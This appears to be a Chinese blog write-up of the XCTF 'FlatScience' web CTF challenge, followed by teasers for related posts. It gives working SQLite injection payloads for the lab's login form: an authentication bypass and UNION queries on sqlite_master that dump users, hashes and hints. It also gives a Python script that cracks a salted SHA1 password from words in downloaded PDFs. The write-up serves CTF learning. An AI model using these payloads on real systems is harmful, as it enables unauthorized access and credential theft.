FlatScience

  • 题目描述

    啥描述也没有

  • 解题过程

    • 页面有好多链接,除了论文pdf之外,还有子目录下的index.html

      比如:/1/index.html/1/3/index.html

    • 扫了下,有/admin.php,/login.phprobots.txt(里面也是这俩页面)

    • /login.php页面,id加引号有报错,是SQLite3

      ' or 2=2 --直接登录上了,进来是最开始的那个/index.html

      登陆成功会跳转,没有回显,猜测可以进行布尔/延时盲注,以前好像没做过sqlite的注入题,好多关键字和函数都用不了,找的一些payload也用不了,丢给sqlmap跑了一下,可以延时盲注,但这个盲注太慢了(一直出错)

    • 去看了/admin.php,大概是/login.php的加强版,没法注入

    • 到这块思路有点断,只能等比蜗牛还慢的sqlmap跑点东西出来

    • 等结果的时候看了下源码,发现有测试参数

      访问?debug,返回了源码(下面是php部分)

      <?php
      
if(isset($_POST['usr']) && isset($_POST['pw'])){
      
        $user = $_POST['usr'];
      
        $pass = $_POST['pw'];

        $db = new SQLite3('../fancy.db');

        $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
      
    if($res){
      
        $row = $res->fetchArray();
      
    }
      
    else{
      
        echo "<br>Some Error occourred!";
      
    }

    if(isset($row['id'])){
      
            setcookie('name',' '.$row['name'], time() + 60, '/');
      
            header("Location: /");
      
            die();
      
    }

}

if(isset($_GET['debug']))
      
highlight_file('login.php');
      
?>

      因为/admin.php页面给了用户名是admin,这里看看能不能注处对应的密码

      注意到:

      • user参数对应输入框ID
      • name参数会被写到cookie

      所以可以union select用admin的密码代替name

      ' union select id,password from Users where name='admin' --

      拿到密码是+3fab54a50e770d830c0416df817567662a9dc85c, = =忘了还有sha1

      刚好sqlmap也跑完了,发现只有一个Users

    • 猜测是要用admin账号在/admin.php登录,所以需要拿到密码

      有两个思路

      • 一个是跑出密码

      • 一个是覆盖之前的密码

        INSERT INTO Users(id, name, password) VALUES(999, 'test', '7c4a8d09ca3762af61e59520943dc26494f8941b')发现insert不可用

      • 用上边查密码的方法查了下admin的id=1,

        update Users set password='7c4a8d09ca3762af61e59520943dc26494f8941b' where id=1发现update不可用

    • 到这基本没思路了,跑密码也不能硬跑啊。。。

    • 看wp

      • 确实是队sqlite的了解太少了,这里用到了sqlite自带的结构表sqlite_master

        ' union select name,sql from sqlite_master --+

        得到

        CREATE TABLE Users(
        
    id int primary key,
        
    name varchar(255),
        
    password varchar(255),
        
    hint varchar(255)
        
)

      • 把这几个字段都扒下来

        ' union select id,group_concat(xxx) from Users --+

        name password hint
        admin 3fab54a50e770d830c0416df817567662a9dc85c my fav word in my fav paper?!,
        fritze 54eae8935c90f467427f05e4ece82cf569f89507 my love is … ?
        hans 34b0bb7c304949f9ff2fc101eef0f048be10d3bd the password is password

      • 看hint的意思,密码是paper里的一个单词

        回过头去看这些paper的链接,没啥不同的,都下载下来吧

      • 贴个处理pdf的代码,偷懒copy了一份,然后调好了bug(python3)

        from pdfminer.pdfparser import PDFParser
        
from pdfminer.pdfdocument import PDFDocument
        
from pdfminer.pdfpage import PDFPage
        
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
        
from pdfminer.converter import PDFPageAggregator
        
from pdfminer.layout import LTTextBoxHorizontal, LAParams
        
import logging
        
import hashlib
        
import re
        
import os

def pdf_2_txt(start, end):
        
    pdf_filename = start
        
    txt_filename = end
        
    # 不显示warning
        
    logging.propagate = False
        
    logging.getLogger().setLevel(logging.ERROR)
        
    device = PDFPageAggregator(PDFResourceManager(), laparams=LAParams())
        
    interpreter = PDFPageInterpreter(PDFResourceManager(), device)
        
    parser = PDFParser(open(pdf_filename, 'rb'))
        
    doc = PDFDocument(parser)
        
    parser.set_document(doc)
        
    # 检测文档是否提供txt转换,不提供就忽略
        
    if not doc.is_extractable:
        
        pass
        
    else:
        
        with open(txt_filename, 'w+', encoding="utf-8") as fw:
        
            print("num page:{}".format(len(list(PDFPage.create_pages(doc)))))
        
            for page in PDFPage.create_pages(doc):
        
                interpreter.process_page(page)
        
                layout = device.get_result()
        
                for x in layout:
        
                    if isinstance(x, LTTextBoxHorizontal):
        
                        results = x.get_text()
        
                        fw.write(results)

def get_pwd():
        
    for a in range(1, 31):
        
        f = open(filePath + '\\txt\\' + str(a) + ".txt", "r", encoding='UTF-8').read()
        
        wordlist = re.split(" |\n", f)

        for s in wordlist:
        
            y = s + "Salz!"
        
            encode = hashlib.sha1(y.encode('utf-8')).hexdigest()
        
            if encode == "3fab54a50e770d830c0416df817567662a9dc85c":
        
                print("password is :" + s)
        
                break

if __name__ == '__main__':
        
    filePath = ''  # 绝对路径
        
    lists = os.listdir(filePath)

    for i in range(1, 31):
        
        x = filePath + '\\' + lists[i - 1]
        
        pdf_2_txt(x, filePath + '\\txt\\' + str(i) + '.txt')  # 在目录下创建一个txt文件夹

  • 参考

    https://blog.csdn.net/qq_42967398/article/details/103480502

    https://www.e-learn.cn/topic/2155194

    https://www.cnblogs.com/xiaozi/p/5760321.html

XCTF-FlatScience的更多相关文章

  1. 攻防世界(XCTF)WEB(进阶区)write up(三)

    挑着做一些好玩的ctf题 FlatScience web2 unserialize3upload1wtf.sh-150ics-04web i-got-id-200 FlatScience 扫出来的lo ...

  2. 攻防世界(XCTF)WEB(进阶区)write up(四)

    ics-07  Web_php_include  Zhuanxv Web_python_template_injection ics-07 题前半部分是php弱类型 这段说当传入的id值浮点值不能为1 ...

  3. 攻防世界(XCTF)WEB(进阶区)write up(一)

      cat ics-05 ics-06 lottery Cat XCTF 4th-WHCTF-2017 输入域名  输入普通域名无果  输入127.0.0.1返回了ping码的结果 有可能是命令执行 ...

  4. XCTF攻防世界Web之WriteUp

    XCTF攻防世界Web之WriteUp 0x00 准备 [内容] 在xctf官网注册账号,即可食用. [目录] 目录 0x01 view-source2 0x02 get post3 0x03 rob ...

  5. xctf进阶-unserialize3反序列化

    一道反序列化题: 打开后给出了一个php类,我们可以控制code值: `unserialize()` 会检查是否存在一个 `__wakeup()` 方法.如果存在,则会先调用 `__wakeup` 方 ...

  6. 日常破解--从XCTF的app3题目简单了解安卓备份文件以及sqliteCipher加密数据库

    一.题目来源     题目来源:XCTF app3题目 二.解题过程     1.下载好题目,下载完后发现是.ab后缀名的文件,如下图所示:     2.什么是.ab文件?.ab后缀名的文件是Andr ...

  7. 日常破解--XCTF easy_apk

    一.题目来源     来源:XCTF社区安卓题目easy_apk 二.破解思路     1.首先运行一下给的apk,发现就一个输入框和一个按钮,随便点击一下,发现弹出Toast验证失败.如下图所示: ...

  8. XCTF练习题-WEB-webshell

    XCTF练习题-WEB-webshell 解题步骤: 1.观察题目,打开场景 2.根据题目提示,这道题很有可能是获取webshell,再看描述,一句话,基本确认了,观察一下页面,一句话内容,密码为sh ...

  9. 【Hack.lu-2017】FlatScience

    信息: 题目来源:Hack.lu-2017 标签:SQL注入.源码泄露 解题过程 题目页面有多层,存在许多pdf文件,首先进行目录扫描: [TIME] => 2020-07-07 16:08:5 ...

  10. 【XCTF】ics-04

    信息: 题目来源:XCTF 4th-CyberEarth 标签:PHP.SQL注入 题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag 解题过程 进入注册页面,尝试注册: 进行登录 ...

随机推荐

  1. idea配置struts2.5环境

    struts2不是struts1的下一代产品,是在struts1和WebWork技术的基础上进行合并后的全新框架,虽然两个名字相似,但是设计思想却有很大的不同. 使用本地的l ib 或者downloa ...

  2. [HDU5592] ZYB's Premutation

    [HDU5592] ZYB's Premutation 题目大意:一个由\([1,n]\)组成的数列,但不知道具体排列,但给出每个前缀的逆序对数目,让你还原排列 Solution 创造一颗\([1,n ...

  3. LiberOJ #124. 除数函数求和 【整除分块】

    一.题目 #124. 除数函数求和 二.分析 比较好的一题,首先我们要对题目和样例进行分析,明白题目的意思. 由于对于每一个$d$,它所能整除的数其实都是定的,且数量是$ \lfloor \frac{ ...

  4. 【wp】2021V&NCTF

    前几天打完的V&NCTF公开赛,做题的时候没记过程,这是复现wp. 最后排名Top 18,三道RE+两道杂项(wp没啥可放的hhh)+一道web,感觉re题目还是挺好的,难度适中点赞,尤其pc ...

  5. P1164_小A点菜(JAVA语言)

    思路 简单动态规划问题 题目背景 uim神犇拿到了uoi的ra(镭牌)后,立刻拉着基友小A到了一家--餐馆,很低端的那种. uim指着墙上的价目表(太低级了没有菜单),说:"随便点" ...

  6. filesort排序原理

    在执行计划中,可能经常看到有Extra列有filesort,这就是使用了文件排序,这当然是不好的,应该优化,但是,了解一下他排序的原理也许很有帮助,下面看一下filesort的过程: 1.根据表的索引 ...

  7. java面试-生产环境服务器变慢,谈谈你的诊断思路

    1.uptime:查询linux系统负载 11:16:16 系统当前时间 up 64 days, 19:23 从上次启动开始系统运行的时间3 users 连接数量,同一用户多个连接的时候算多个load ...

  8. 史上最全jdk新特性总结,涵盖jdk8到jdk15!

    前言 在本文中,我将描述自第8版以来Java最重要且对开发人员友好的功能.为什么会有这样的主意?在Web上,您可以找到许多文章,其中包含每种Java版本的新功能列表.但是,由于缺少文章,因此无法简要概 ...

  9. 消息中间件-RabbitMQ基本使用

    RabbitMQ是实现了高级消息队列协议(AMQP)的开源消息代理软件(亦称面向消息的中间件).RabbitMQ服务器是用Erlang语言编写的,而集群和故障转移是构建在开放电信平台框架上的.所有主要 ...

  10. 会议更流畅,表情更生动!视频生成编码 VS 国际最新 VVC 标准

    阿里云视频云的标准与实现团队与香港城市大学联合开发了基于 AI 生成的人脸视频压缩体系,相比于 VVC 标准,两者质量相当时可以取得 40%-65% 的码率节省,旨在用最前沿的技术,普惠视频通话.视频 ...